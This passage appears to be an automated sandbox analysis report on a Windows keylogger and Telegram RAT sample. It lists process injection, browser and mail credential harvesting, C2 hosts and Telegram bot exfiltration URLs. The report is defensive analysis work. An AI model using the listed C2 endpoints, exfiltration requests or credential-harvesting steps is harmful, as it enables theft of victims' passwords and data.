Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7B3008			Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D55008			Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

0_2_00B01201

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AE2BA5

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B0B226 SendInput,keybd_event,

0_2_00B0B226

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00B222DA

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

0_2_00B00B62

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B01663

Source: oagkiAhXgZ.exe, reindulgence.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: oagkiAhXgZ.exe, reindulgence.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AC0698 cpuid

0_2_00AC0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00B18195

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AFD27A GetUserNameW,

0_2_00AFD27A

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00ADB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_00ADB952

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA42DE

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: reindulgence.exe	Binary or memory string: WIN_81
Source: reindulgence.exe	Binary or memory string: WIN_XP
Source: reindulgence.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: reindulgence.exe	Binary or memory string: WIN_XPe
Source: reindulgence.exe	Binary or memory string: WIN_VISTA
Source: reindulgence.exe	Binary or memory string: WIN_7
Source: reindulgence.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4503499824.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4503982433.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00B21204
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00B21806
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_00FE1204
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00FE1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	11 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	321 Security Software Discovery	SSH	121 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
oagkiAhXgZ.exe	63%	ReversingLabs	Win32.Spyware.Snakekeylogger
oagkiAhXgZ.exe	100%	Avira	HEUR/AGEN.1319493
oagkiAhXgZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	100%	Avira	HEUR/AGEN.1319493
C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	63%	ReversingLabs	Win32.Exploit.VIPKeylogger

Source	Detection	Scanner	Label
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	phishing
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	phishing
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000007.00000002.4503982433.00000000031E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	RegSvcs.exe, 00000003.00000002.4503499824.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000007.00000002.4503982433.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aborters.duckdns.org:8081	reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	false		high
